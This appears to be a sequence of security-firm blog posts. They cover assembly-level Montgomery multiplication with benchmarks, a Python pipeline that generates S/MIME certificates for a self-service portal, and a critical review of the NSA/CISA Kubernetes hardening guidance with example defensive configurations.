A view into the micro-architecture of Intel’s Core2 machine is shown below. While that machine is over a decade old, the diagram remains very instructive and more modern versions have similar structure with greatly increased capacities. The assembly code we soon develop should run well on all modern Intel and AMD x86-64 processors shipped within the past 5 years (at least).

https://commons.wikimedia.org/w/index.php?curid=2541872 CC BY-SA 3.0

There are four interesting things to observe in the diagram above.

  1. The (pink) instruction fetch logic is capable of supplying six instructions from the fetch buffer to the instruction queue per cycle. Clearly the intent is to keep the multiple parallel execution units downstream (described next) stuffed full of work.
  2. The (yellow) execution units are capable of executing multiple similar and dissimilar operations in parallel. The configuration is intended to support many simple and frequent operations separately from the fewer, more complex and rarer operations. The various operations will clearly involve very different throughput and latency characteristics.
  3. The (salmon) reservation station helps manage the operand dependencies between instructions, and the register alias table allows for more physical registers than logical registers. The adjacent reorder buffer and retirement register file logic allows instructions to execute out-of-order but get committed in-order. While humans typically think in a nice orderly step-by-step fashion, the actual instruction execution patterns can go wildly out-of-order (provided they are ultimately finalized in-order).
  4. While the specific individual pipeline stages are not shown, modern processors have very deep pipelines and thus require extensive branch prediction logic to minimize overhead from mispredictions. This is pertinent to unrolling small loops.

The four items above allow the processor to extract a large amount of the underlying instruction-level parallelism throughout each of the fetch, decode, execute and finalize/retire steps. It is quite fantastic that all of this complexity is effectively hidden from the application programmer. A bigger, better and newer micro-architecture should simply result in better performance on strictly unchanged code.

CPU Architecture

In some cases, specialized instructions are added to the programming model that provide significant speed-up for very specific algorithms. While many people first think of the very well-known ‘Intel MMX instructions for multimedia algorithms’, there have been many other less prominent instances over the years. Intel’s ADX (Multi-Precision Add-Carry Instruction Extensions) feature provides two new addition instructions that can help increase the performance of arbitrary precision arithmetic. Intel’s BMI2 (Bit Manipulation Instruction Set 2) feature contains a new flag-friendly multiplication instruction among several others not relevant to our purpose. Processors supporting these feature extensions have been shipping since roughly 2015, and may offer a significant performance benefit.

The ‘native’ Montgomery multiplication Rust code last shown above involved a large amount of addition operations (outside of the array index calculation) centered around lines 112-114, 118, 124-125 and 129. These operations are building larger-precision results (e.g., a full partial product) from smaller-precision instructions (e.g., a 64-bit add). Normally, a series of ‘Add with carry’ (ADC) instructions are used that add two operands and the carry(in) flag to produce a sum and a new carry(out) flag. The instructions are ordered to work on the least-to-most significant operand limb one at a time. The dependence upon a single carry flag presents a bottleneck that allows just one chain to operate at a time in principle, thus limiting parallelism.

Intel realized the limitation of a single carry flag, and introduced two instructions that effectively use different carry flags. This allows the programmer to express more instruction-level parallelism by describing two chains that can be operating at the same time. The ADX instruction extensions provide:

  • ADCX Adds two 64-bit unsigned integer operands plus the carry flag and produces a 64-bit unsigned integer result with the carry out value set in the carry flag. This does not affect any other flags (as the prior ADD instructions did).
  • ADOX Adds two 64-bit unsigned integer operands plus the overflow flag and produces a 64-bit unsigned integer result with the carry out value set in the overflow flag. This does not affect any other flags. Note that ordinarily the overflow flag is used with signed arithmetic.

Meanwhile, the Rust code also contains a significant amount of multiplication operations interspersed amongst the addition operations noted above. The ordinary MUL instruction multiplies two 64-bit unsigned integer operands to produce a 128-bit result placed into two destination registers. However, this result also affects the carry and overflow flags – meaning it will interfere with our ADCX and ADOX carry chains. Furthermore, the output registers must be %rax and %rdx which limits flexibility and constrains register allocation. To address this, the BMI2 instruction extensions include:

  • MULX Multiplies two 64-bit unsigned integer operands and produces an unsigned 128-bit integer result stored into two destination registers. The flags are not read nor written, thus enabling the interleaving of add-with-carry operations and multiplications.

The two new addition instructions inherently overwrite one of the source registers with the destination result. In other words, adcxq %rax, %r10 will add %rax to %r10 with the carry flag, and place the result into %r10 and the carry flag. The new multiplication instruction requires one of its source operands to always be in %rdx. In other words, mulxq %rsi, %rax, %rbx is the multiplication of %rsi by %rdx with the lower half of the result written into %rax and the upper half written into %rbx. The q suffix on each instruction is simply the quadword suffix syntax of the GNU Assembler.

Register Allocation

The three new instructions described above will form the core of the Montgomery multiplication function in assembly. Since the x86 instruction set is rather register constrained, a strategy that minimizes the actual working set of active values must be developed. We saw earlier how only seven limbs of temp are in play at any one time and the outer loop index i formed a base address when accessing temp. Consider a ‘middle’ iteration of the outer loop, as the simpler first iteration can be derived from this. This flattened iteration is implemented as an assembler macro that can be later placed singly inside an outer loop or in multiple back-to-back instances that unroll the outer loop.

The first inner loop calculating the partial product will be unrolled and assumes temp[i + 0..6] (exclusive) arrives in registers %r10 through %r15. The %rax and %rbx registers will temporarily hold multiplication results as we step through a.v[0..6] * b.v[i] (with a fixed i). The a.v[0..6] (exclusive) operands will involve a relative address using %rsi as the base, while the fixed operand will be held in %rdx. At the end of the inner loop, the %rbp register will be used to hold temp[i + 6].

The second inner loop implementing the reduction step will also be unrolled and assumes temp[i + 0..7] (exclusive) is provided in the registers %r10 through %r15 along with %rbp. The register strategy for holding the multiplication results is modified slightly here due to A) the add instruction requiring a source operand being overwritten by the result, and B) the calculation process effectively shifts the working set to the right by one step (thus the least significant value will drop away, but its carry out will still propagate).

Basic Register Allocation Structure/Plan

The general plan for register allocation within one ‘middle’ iteration of the outer loop is shown above in simplified fashion. The upper crimson triangle implements the partial product inner loop and is executed first. The lower green triangle implements the reduction step and executes second. Double-width boxes hold the multiplication results, and the red/green arrows identify the two separate carry chains of the addition instructions. The nearly side-by-side placement of the addition operations is meant to hint at their parallel operation. While things visually appear to step forward in a nice orderly single-cycle progression, multiplication latencies are significantly higher than addition so the out-of-order capabilities of the micro-architecture is crucial to performance. The output data within %r10 through %r15 is compatible with input data within %r10 through %r15, so instances of this block can be repeated one after another.

The initial iteration of the outer loop is a simplification of that shown above. Simply assume %r10 through %r15 start at zero and remove everything no longer needed.

Montgomery Multiplication in Assembly

The bulk of the hard work has now been done. A macro implementing one iteration of the outer loop in x86-64 assembly is shown below. The fully unrolled outer loop is implemented with a simplified initial instance followed by five back-to-back instantiations of this code. [Code excerpt on GitHub]

The final Montgomery multiplication function is fully implemented in src/mont_mul_asm.S and is a straightforward concatenation of the following elements:

  1. A function label attached to the prologue. Any registers used by the function that are required to be preserved across function calls must be pushed to the stack prior to use. The label corresponds to the extern “C” clause in the Rust lib.rs source file.
  2. The MODULUS is stored as quadword constants and their address loaded into the %rcx register. These values are utilized in the reduction step.
  3. An instance of the simplified first outer loop.
  4. Five instances of the macro shown above. Note the presence of offset parameter on line 82. This is used to form an index into b.v[i] on line 84 and it is increased by 8 on each instance.
  5. The final modulus correction logic is virtually identical to what has already been seen for addition: subtract the modulus from the initial result and return that if there is no borrow, otherwise return the initial result.
  6. A function epilogue that pops the registers from the stack that were pushed there in the prologue.

Again, the full routine can be seen in its totality here on GitHub. Note that the Rust build.rs source file integrates everything with cargo such that there are no additional steps required to build.

A final aside: Unrolling Rust and intrinsics

The code repository already fully supports further experimentation with A) flattened Rust code that uses the same strategy to minimize its active working set, and B) Rust intrinsics. Let’s briefly touch on both topics before including them in the benchmarking results described next.

The assembly code can be back-ported or re-implemented back into flat/raw Rust with the same ‘register allocation’ strategy to manage the active working set and avoid declaring a temp[] array. This gives surprisingly good results and suggests that a modern micro-architecture can look even further ahead, perhaps up to 200 (simple) instructions, to extract more instruction level parallelism from separate but adjacent carry chains. Hence the old adage: “You can rarely outsmart the compiler”. Look for the fe_mont_mul_raw() function.

Alternatively, Rust provides intrinsics that specifically target the ADCX, ADOX and MULX instructions. Unfortunately, the toolchain cannot emit the first two yet. Nonetheless, the fe_mont_mul_intrinsics() function shows exactly how this is coded. The MULX instruction is indeed emitted and does deliver a significant benefit by not interfering with the flags.

Benchmarking

Everything is ready to go – let’s benchmark! Here are sample results from my machine:

$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench
Ubuntu 20.04.2 LTS on Intel Core i7-7700K CPU @ 4.20GHz with Rust version 1.53

1. Addition X 1000 iterations:                          [3.6837 us 3.6870 us 3.6905 us]
2. Subtraction X 1000 iterations:                       [3.1241 us 3.1242 us 3.1244 us]
3. Multiplication by BigUint X 1000 iterations:         [517.54 us 517.68 us 517.85 us]
4. Multiplication in Rust (mont1 blog) X 1000 iter:     [46.037 us 46.049 us 46.064 us]
5. Multiplication in flat Rust X 1000 iterations:       [34.719 us 34.741 us 34.763 us]
6. Multiplication in Rust with intrinsics X 1000 iter:  [31.497 us 31.498 us 31.500 us]
7. Multiplication in Rust with assembly X 1000 iter:    [29.573 us 29.576 us 29.580 us]

There are three caveats to consider while interpreting the above results. First and foremost, consider these results as a qualitative sample rather than a definitive result. Second, each result is presented as minimum, nominal and maximum timing – so the key figure is the central number. Finally, each function is timed across 1000 iterations, so the timing result for a single iteration corresponds to units of nanoseconds rather than microseconds. On this machine, the Montgomery multiplication function written in assembly language takes approximately 29.576 ns.

The baseline non-Montgomery multiplication function utilizing BigUint is shown in entry 3. The (non BigUint) Montgomery multiplication function developed in the prior post is entry 4. The benefits of actively managing the working set and unrolling the inner loops can be seen in entry 5. The benefit of the MULX intrinsic appears in entry 6. Pure assembly is shown in entry 7. While the assembly routine provides more than 15X performance improvement over the BigUint reference implementation in entry 3, it also utilizes the CMOV instructions in the final correction steps to reduce timing side-channel leakage relative to all other entries.

What we learned

We started with a reference multiplication routine utilizing the BigUint library crate as our performance baseline. Then we adapted the Montgomery multiplication function in Rust from the prior blog post into an equivalent x86-64 assembly language version that is over 15X faster than the baseline. Along the way we looked at how the micro-architecture supports increased parallelism, how several new instructions in the architecture also support increased parallelism, and got insight into how to use the instructions with planned register allocations. A few hints (leading to intentionally unanswered questions) were dropped regarding the potential of raw Rust and intrinsics, with further investigation left as an exercise for the reader. Finally, we benchmarked a broad range of approaches.

The code is available publicly on GitHub, self-contained and ready for further experimentation.

What is next?

As mentioned at the start, pairing-based cryptography involves a wide range of algorithms, techniques and optimizations. This will provide a large menu of follow-on optimization topics which may ultimately include the polynomial-related functionality that zkSNARKS utilize with pairings. Stay tuned!!

Thank you

The author would like to thank Parnian Alimi, Paul Bottinelli and Thomas Pornin for detailed review and feedback. The author is solely responsible for all remaining issues.

CertPortal: Building Self-Service Secure S/MIME Provisioning Portal

10 September 2021 at 06:48

tl;dr

NCC Group’s Research & Development team designed and built CertPortal which allows users to create and manage S/MIME certificates automating the registration and renewal to allow enterprise scale deployment.

The core of the system integrates with DigiCert to create an S/MIME certificate and then stores the certificate, the password, and the creation and expiry dates in a CyberArk safe. It then publishes the public certificate in the Microsoft Exchange Global Address List against the user’s account.

The portal presents the user with the two options of ‘show me my password’ and ‘download certificate’. This approach has removed a number of manual processes whilst providing significant efficiency and security gains.

The Beginning

Encryption as standard is both a crowning jewel and a backbone of modern HTTP traffic, so much so that browsers warn users of websites that do not offer it. On top of that, services like Let’s Encrypt make the process of adding encryption to a public facing website easy.

In the world of S/MIME this is not the case. There are services such as DigiCert or Entrust which allow API users to automatically generate S/MIME certificates, but this still leaves a large burden on the IT team to run the scripts to generate a password and private key, request a certificate, and then securely deliver all of the above to the end user.

In steps CertPortal, an S/MIME self-service portal to fill this void. It needs to be able to do three things well:

  1. On request generate a password, private key, and CSR, request a certificate, and generate a PFX file.
  2. Securely store those files and retrieve them on request.
  3. Provide a simple-to-use interface for users to perform the first two things.

In this post we will be discussing the first thing: Generating an S/MIME certificate.

Passwords, Private Keys, and CSRs

Assuming we have received a request to generate an S/MIME certificate the first thing we need to do is prepare ourselves to request a certificate from our Certificate Authority. This requires us to create a cryptographically secure password, a private key, and a Certificate Signing Request (CSR).

Secure Passwords

The first step is to generate a secure password. Fortunately for us, the secrets module has been available since Python 3.6, which makes this process fairly straightforward. We want our script to be repeatable, so we will store the generated password on local disk; if we have a failure later in the pipeline, we can easily restart the process and try again.

This means we need to check our storage directory for an existing password file and return its contents if found. Otherwise, we need to generate a cryptographically secure password, store it in the storage directory, and return the newly generated password.

import os
import secrets
import string

# Character set and length for generated passwords; the set here (letters,
# digits, and a handful of symbols) is an assumption -- tune both to your
# own security policy.
PWD_CHRS = string.ascii_letters + string.digits + '@#$%^&*-+=,.'
PWD_LEN = 16


def get_password(storage_dir: str) -> bytes:
    pwd_file = os.path.join(storage_dir, 'password.txt')
    try:
        with open(pwd_file, 'rb') as f:
            password = f.read()
    except FileNotFoundError:
        list_rand_chrs = [secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)]
        password_str = ''.join(list_rand_chrs)
        password = password_str.encode('utf-8')
        with open(pwd_file, 'wb') as f:
            f.write(password)

    return password

The interesting line in the above excerpt is the one generating the password. Choosing the password characters and length is a matter for your own security policies. There are three steps to generating the password:

  1. Generate a list of random characters: [secrets.choice(PWD_CHRS) for _ in range(PWD_LEN)]
  2. Join the list into a string: ''.join(list_rand_chrs)
  3. Convert the string into its bytes representation: password_str.encode('utf-8')

Private Keys

Once we have a password the next step is to generate a private key. To achieve this we will use the cryptography package. Like the previous step we want this step to be robust and repeatable.

This means we need to check our storage directory for an existing private key file, load it using the password, and return it. Otherwise, we generate a new private key protected with the password, store it in the storage directory, and return the private key.

import os

from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

KEY_SIZE = 4096


def get_private_key(storage_dir: str, password: bytes):
    key_file = os.path.join(storage_dir, 'private.key')
    try:
        with open(key_file, 'rb') as f:
            key = load_pem_private_key(
                f.read(), password, default_backend())
    except (ValueError, FileNotFoundError):
        key = rsa.generate_private_key(
            public_exponent=65537,
            backend=default_backend(),
            key_size=KEY_SIZE)

        with open(key_file, 'wb') as f:
            f.write(key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.BestAvailableEncryption(password)))

    return key

This process is fairly straightforward when you know what you’re doing. The important part is choosing the key size, which needs to be a power of 2 of at least 2048 bits.

Certificate Signing Requests

The last part of this step is creating the Certificate Signing Request (CSR). To achieve this simply follow the tutorial provided by the cryptography package with a couple of minor amendments:

from cryptography import x509
from cryptography.hazmat.backends import default_backend as cryptography_default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.x509.oid import NameOID

csr = x509.CertificateSigningRequestBuilder().subject_name(x509.Name([
    # Provide various details about who we are
    x509.NameAttribute(NameOID.COMMON_NAME, csr_attrs['common_name']),
    x509.NameAttribute(NameOID.COUNTRY_NAME, csr_attrs['country_name']),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, csr_attrs['state_name']),
    x509.NameAttribute(NameOID.LOCALITY_NAME, csr_attrs['locality_name']),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, csr_attrs['organization_name']),
    x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, csr_attrs['organization_unit_name']),
])
).add_extension(x509.SubjectAlternativeName([
    x509.DNSName(csr_attrs['common_name'])
]), critical=False
).sign(key, hashes.SHA512(), cryptography_default_backend())

We need to set the ‘Common Name’ and ‘Subject Alternative Name’ to the email address the S/MIME certificate is being generated for. There is no need to check the storage directory for an existing CSR as, unlike the password and private key, the CSR will be the same every time (provided we use the same private key).

Asking the Certificate Authority

Now that we have a password, private key, and CSR, we can move on to asking the Certificate Authority (CA) for an S/MIME certificate. This step will vary depending on which provider we use, but the basic process is the same for all (a rough sketch follows the list below):

  1. Authenticate with their API
  2. Request a new S/MIME type certificate from their API
  3. Store the request ID returned for future reference
  4. Wait until the S/MIME certificate has been issued
  5. Download the certificate (including all chain certificates)
  6. Store the certificates in the same storage directory as the password, private key, and CSR
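
Exactly what these calls look like depends entirely on the CA’s API, but as a rough illustration the flow might resemble the sketch below, in which ca_client and its submit_csr, is_issued, and download methods are hypothetical stand-ins for a provider-specific client:

import os
import time


def request_smime_certificate(ca_client, csr_pem: bytes, storage_dir: str):
    # csr_pem can be produced via csr.public_bytes(serialization.Encoding.PEM)

    # Submit the CSR and record the request ID for future reference
    request_id = ca_client.submit_csr(csr_pem, cert_type='smime')
    with open(os.path.join(storage_dir, 'request_id.txt'), 'w') as f:
        f.write(request_id)

    # Poll until the CA has issued the certificate
    while not ca_client.is_issued(request_id):
        time.sleep(30)

    # Download the certificate (including the chain) and store it alongside
    # the password, private key, and CSR
    cert_pem, chain_pem = ca_client.download(request_id)
    with open(os.path.join(storage_dir, 'smime.crt'), 'wb') as f:
        f.write(cert_pem)
    with open(os.path.join(storage_dir, 'chain.crt'), 'wb') as f:
        f.write(chain_pem)

    return cert_pem, chain_pem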

Bundle into a PFX (PKCS12) file

Lastly, we need to bundle the private key, S/MIME certificate, and chain certificates into a PFX (PKCS12) file for our end user to be able to download via the portal. To do this we will require one more Python package: OpenSSL (note that the cryptography package added PKCS12 serialization in version 3.0; CertPortal, however, currently uses version 2). Like the CSR, the process here is straightforward when you know what you are doing:

import os

from OpenSSL import crypto


def get_pfx(storage_dir: str, cert, chain: list, key, password: bytes, friendly_name: bytes = None):
    """
    Generate a PFX (PKCS12) from the certificate(s), key, and password then store it in a file
    called `smime.pfx` inside `storage_dir`.
    :param storage_dir: Directory to store the PFX file
    :param cert: cryptography S/MIME certificate
    :param chain: List of cryptography chain certificates issued by the CA
    :param key: The cryptography private key
    :param password: The private key password
    :param friendly_name: The friendly name in the PKCS #12 structure
    """
    pfx = crypto.PKCS12()
    pfx.set_friendlyname(friendly_name or b'S/MIME Certificate')
    pfx.set_privatekey(crypto.PKey.from_cryptography_key(key))
    pfx.set_certificate(crypto.X509.from_cryptography(cert))
    pfx.set_ca_certificates([crypto.X509.from_cryptography(c) for c in chain])
    pfx_data = pfx.export(password)

    # certificate_file_name() is a CertPortal helper not shown in this excerpt;
    # for the PFX it produces 'smime.pfx', as the docstring notes
    with open(os.path.join(storage_dir, certificate_file_name('pfx')), 'wb') as f:
        f.write(pfx_data)

    return pfx

We start by creating a crypto.PKCS12 object and setting a friendly name for the certificate. Next we set the private key. Then we set the S/MIME certificate (after converting it from its cryptography representation), and do the same for the CA certificates. Finally we export the data and store it in the storage directory.
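
Putting the pieces together, a hypothetical end-to-end run might look like the following (the storage path and friendly name are illustrative, and cert and chain come from the CA step above):

storage_dir = '/srv/certportal/example-user'  # illustrative path

password = get_password(storage_dir)
key = get_private_key(storage_dir, password)
# ... build the CSR as shown earlier, submit it to the CA, and obtain
# `cert` and `chain` ...
pfx = get_pfx(storage_dir, cert, chain, key, password,
              friendly_name=b'S/MIME Certificate')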

Conclusion

At the end of this process we have a secure password, private key, CSR, and PFX ready to be downloaded by the end user. We still need to be able to securely store these files and provide an interface for an end user to generate a new certificate and access existing certificates. We will address the secure storage in a future post.

We hope that this post has given you a good understanding of how to create an S/MIME certificate programmatically.

Final remarks

We have only looked at the bare bones of this process and as such skipped over many best practices, such as storing the configurations, using interfaces, and implementing CA-specific backends. These are, however, outside the scope of this post.

NSA & CISA Kubernetes Security Guidance – A Critical Review

9 September 2021 at 15:08

Last month, the United States’ National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report (CTR) detailing the security hardening they recommend be applied to Kubernetes clusters, which is available here. The guidance the document contains is generally reasonable, but there are several points which are either incorrect or do not provide sufficient context for administrators to make good security-focused decisions.

In this blog post, we begin by outlining the general guidance (“The Good”), and then highlight some points where the CTR is either misleading or incorrect (“The Bad” and “The Complex”). This post is split into three parts:

  1. The Good: A summary of the broadly sensible hardening guidance the CTR provides.
  2. The Bad: Places where the NSA/CISA guidance overlooked important aspects of Kubernetes security, or where the guidance was out of date at time of publication.
  3. The Complex: Considerations for some of the more common complex use cases not covered by the CTR guidance, including useful audit configurations that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

The Good

On the whole, the guidance provided is sensible and will help administrators bring their clusters to a reasonable and secure state.

The high-level guidance from the document is as follows:

  • Scan containers and Pods for vulnerabilities or misconfigurations
  • Run containers and Pods with the least privileges possible
  • Use network separation to control the amount of damage a compromise can cause
  • Use firewalls to limit unneeded network connectivity and encryption to protect confidentiality
  • Use strong authentication and authorization to limit user and administrator access as well as to limit the attack surface
  • Use log auditing so that administrators can monitor activity and be alerted to potential malicious activity
  • Periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied

Each of these points relates back to generic guidance applicable to almost any platform, regardless of the technology in use: restrict access through authentication and network filtering, log what is permitted and what gets requested, apply security options where available, and keep components up to date.

The guidance also calls out the common sources of compromise, identifying supply chain attacks, malicious threat actors, and insider threats. Despite “malicious threat actors” covering a fairly broad scope as an answer to “who wants to hack us?”, these three sources of compromise cover the majority of the attack paths we have followed when reviewing customer environments.

High Level Recommendations

Scan Container Images

Vulnerability scanning is a key component of staying secure, regardless of the platform used. Regularly scanning your container images is a good way to catch newly identified vulnerabilities in the software you are running before they can be exploited.

Patching container images generally needs to happen in two stages: downloading fresh versions of the published image from a vendor, and applying any patches which have been released since the image was last built through a package manager like apt or yum. As with patching of any other system, care should be taken to ensure that all of your software still works as intended after any patches have been applied. You should also make sure all images are pulled from trusted sources (such as official Docker images, or images from verified publishers). Additionally, any programming language based dependencies (Ruby/Bundler, Python/Pip etc.) should be updated regularly.

Follow the Principle of Least Privilege

Running containers with the lowest level of privileges possible will help to reduce the blast radius of a compromise, reducing what an attacker is able to do should they gain access to a single pod through a remote code execution (RCE) vulnerability in a microservice or similar. This can be accomplished in a few ways, the simplest of which is to build container images to run as a non-root user.

Kubernetes can also force a container to run as a specific user through the use of the SecurityContext directive. This approach is effective, but may result in file permission problems in images which expect to be run as UID 0.
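
As a minimal illustration (the image and UID below are placeholders), a Pod spec enforcing a non-root user might look like this:

apiVersion: v1
kind: Pod
metadata:
  name: example-app
spec:
  containers:
    - name: app
      image: registry.example.com/app:1.0   # placeholder image
      securityContext:
        runAsNonRoot: true                  # refuse to start if the image runs as UID 0
        runAsUser: 10001                    # any non-zero UID the image's file permissions allow
        allowPrivilegeEscalation: false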

The NSA/CISA guidance also mentions the possibility of using a rootless Docker engine. While this can work for a standalone Docker instance, support for running a rootless engine under Kubernetes is not widely available, and doing so is generally not advised on production systems.

Another option is to use user namespacing, effectively allowing contained processes to run “as root” inside but mapping to a non-0 UID on the host. This feature is supported on Docker, but is only in alpha levels of support in Kubernetes.

The concepts applied to running pods should also be applied to anywhere authentication and authorization are applied, such as Kubernetes RBAC and service account configurations. Service accounts have permissions which are effectively granted to any running pod configured to use that account. These permissions are rarely required for standard applications, and so most service accounts do not need any permissions at all.
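
On that note, pods that never talk to the apiserver do not need a service account token mounted at all; one small hardening sketch (the names here are illustrative) is to disable automounting on the account:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-sa
  namespace: example
automountServiceAccountToken: false   # pods using app-sa receive no apiserver token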

Isolate Networks

Suggesting enforcing isolation between components is common security advice. Recommending the use of both host/network firewalling and Kubernetes network policies to provide this isolation is good advice, and something that we generally don’t see enough of on customer engagements. It’s not uncommon for us to see environments where the Kubernetes apiserver is exposed to the internet, and for the cluster itself to be completely flat. This means any compromise of one service can provide an attacker with a path to other services, some of which may be running without authentication requirements.

As a minimum we recommend isolating namespaces through the use of a default deny-all network policy for both ingress and egress, then only permitting the connections that are explicitly required. For more sensitive environments we often see customers choose to use a service mesh such as Istio or Linkerd to provide further filtering and additional encryption, however these options do tend to increase operational complexity significantly (and aren’t without their own security issues).
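
To make the baseline concrete, a default deny-all policy is only a few lines; the sketch below (the namespace name is illustrative) blocks all ingress and egress for every pod in the namespace until more specific policies permit traffic:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: example            # apply one per namespace
spec:
  podSelector: {}               # an empty selector matches every pod
  policyTypes:
    - Ingress
    - Egress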

Logging Configuration

As with network isolation, we regularly see customer deployments running without any logging or auditing enabled. Enabling these features will greatly help to identify ongoing attacks should your cluster be targeted, as well as providing essential forensic information should the worst happen and the cluster be compromised by a malicious user.

Regular Configuration Review

Kubernetes clusters require ongoing maintenance, and are not systems which can be simply set-and-forget. Between the relentless patching cycle, the steady stream of security releases and bugfixes, and changes to API versions, regular configuration changes will be required. Checking that security options are applied correctly or tweaking configurations to improve the security posture over time is expected as part of routine maintenance.

As discussed extensively in the released document, Kubernetes clusters are rarely configured securely out of the box. For organisations running multiple clusters, having a standardised deployment process with known-secure options applied will help you ensure consistency.

The Bad

Some of the advice contained in the CTR was not as accurate or up-to-date as guidance from other sources. While not necessarily bad advice, some of the core concepts in Kubernetes security are not discussed in the document, or are not given the attention they deserve.

PSP Deprecation

The biggest issue I have with the guidance is the over-reliance on Pod Security Policy (PSP) as a solution for a range of problems. When first released, PSP was the only available control to prevent a user with the ability to create pods from compromising an entire node in a trivial manner. The guidance correctly points out the many features of PSP, but it does not call out that the PSP feature is officially deprecated, and will be removed in the 1.25 release. This may be because the authors did not want to recommend a specific third party alternative, and the official replacement was only recently formalised.

Several technologies have appeared over the last few years which aim to fix holes in the PSP model, including OPA Gatekeeper, Kyverno, and k-rail. The official replacement for PSP, a newly introduced alpha feature called PodSecurity, was added in Kubernetes 1.22, released in August 2021.

The deprecation of PSP has only been a matter of time, and our advice for some time now has been to implement one of the PSP replacements rather than spend large amounts of engineering time on a feature that will be removed in the next year. Until the PodSecurity admission controller is more mature, this is still our recommendation to customers.
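
For reference, the PodSecurity replacement is driven by namespace labels rather than cluster-scoped policy objects; under the (currently alpha) feature, opting a namespace into the restricted profile is expected to look roughly like this sketch:

apiVersion: v1
kind: Namespace
metadata:
  name: example
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted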

Admission Controllers

Pod Security Policy and each of its alternatives are implemented as admission controllers in a Kubernetes cluster. Admission controllers are an “extra” step, required for approval after a request has passed authentication and authorization checks. These controllers can provide a vast amount of security hardening in an automated manner. Despite this, they are only mentioned in the released guidance once, as part of the image scanning section.

A well-configured admission controller can automatically enforce a significant number of the checks around pod security, for instance by blocking pods which attempt to run with the privileged flag, or programmatically adding the “RunAsUser” field to force every pod to run as a non-root user.
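
As one illustration of this kind of enforcement, Kyverno’s sample policy for blocking privileged containers takes roughly the following form (a sketch based on Kyverno’s pattern syntax; validate against the current Kyverno documentation before use):

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-containers
spec:
  validationFailureAction: enforce
  rules:
    - name: privileged-containers
      match:
        resources:
          kinds:
            - Pod
      validate:
        message: "Privileged containers are not allowed."
        pattern:
          spec:
            containers:
              # =() marks an optional anchor: the check applies only when the
              # field is present, so unset securityContext blocks still pass
              - =(securityContext):
                  =(privileged): "false"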

Inconsistencies/Incorrect Information

The CTR did contain a couple of inconsistencies, or pieces of information which were not correct. For example, page 4 of the guidance states that both the Kubelet and the Scheduler run on TCP 10251 by default. In actuality the Kubelet’s default port is TCP port 10250 for the read-write port, and 10255 for the soon-to-be-deprecated read-only port. Page 15 does provide the correct information for the Kubelet’s read-write port, but does not make any mention of the read-only port. Similarly, the kube-scheduler component runs on TCP port 10259, not 10251, in modern installs, and the controller-manager runs on 10257.

Kubernetes also has an insecure API mode, which the CTR correctly identifies as bypassing all AuthN/AuthZ checks and not using TLS encryption. However, this insecure port was deprecated in version 1.20. Since that release, the --insecure-port flag is only accepted as a parameter if its value is set to 0. If you are running a cluster and have the insecure port enabled, access should be extremely locked down and well monitored/audited, but in general there is no reason this port should be enabled in a modern cluster.

Authentication Issues

When it comes to authentication, the CTR is largely incorrect when it states that Kubernetes does not provide an authentication method by default. While the specifics will vary from install to install, the majority of clusters we review support both token and certificate authentication, both of which are supported natively. Even so, we generally advise against using either for production workloads as each has its downsides. In particular, client certificate authentication makes removing access difficult should it be required to cut off a cluster administrator, as Kubernetes does not support certificate revocation. This becomes more of an issue if an attacker manages to gain access to a certificate issued to the group system:masters, as this group has hard-coded administrative access to the apiserver.

The Complex

With a project as complicated as Kubernetes, it is not possible to cover every option and every edge case in a single document, so one-size-fits-all guidance simply isn’t achievable. Here, I would like to offer considerations for some of the more common complex use cases not covered by the CTR guidance: coming up with a useful audit configuration that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

Levels of Audit Data

While enabling auditing is an excellent idea for a cluster, Kubernetes is heavily reliant on control loops that constantly generate HTTP requests. Logging of every request, and particularly logging the request and response data as suggested in Appendix L of the released guidance, would result in massive amounts of data being stored with the vast majority of this information being expected and not of much use for forensics or debugging. Similarly, the guidance explicitly suggests logging for all pod creation requests, which will result in a large amount of data being stored by routine actions such as pods scaling or being moved from one node to another by a scheduler. Instead of logging full requests, we recommend writing a tailored policy which includes metadata for most requests, and only storing full request/response information for particularly sensitive calls. The exact logging requirements will vary from deployment to deployment in line with your security standards but, in general, logging everything is not considered essential, and can have adverse effects on storage requirements and processing time. In some cases, it can drastically increase operational costs if logs are ingested to a cloud service or a managed service which charges per log-entry.
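
A tailored audit policy along those lines can be quite short; the sketch below keeps full request/response bodies only for RBAC changes (one example of a sensitive call) and records metadata for everything else:

apiVersion: audit.k8s.io/v1
kind: Policy
omitStages:
  - "RequestReceived"
rules:
  # Full bodies only for sensitive write operations
  - level: RequestResponse
    verbs: ["create", "update", "patch", "delete"]
    resources:
      - group: "rbac.authorization.k8s.io"
  # Metadata only for everything else
  - level: Metadata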

Sidecar Resource Requirements

Similarly, the CTR advises that logging can be performed in a number of ways. This is true, and again the option you choose will depend on your specific setup. However, logging sidecars on every container does come with an increase in deployment complexity and a significant increase in resource requirements per pod.

Again, there is no “correct” logging deployment, and each option will have pros and cons. That said, it may be more efficient to have containers log to a specific directory on each node and use either a daemonset or some component of the host configuration to pick up these logs and pass them to a centralised logging location.

External Dependencies are essential

The core of a Kubernetes cluster is comprised of container images, which are generally pulled from an external source. For example the apiserver is generally retrieved from k8s.gcr.io/kube-apiserver. Even excluding the core components, most cloud-native technologies tend to assume they’re being run in a highly connected environment where updates can be retrieved in a trivial manner.

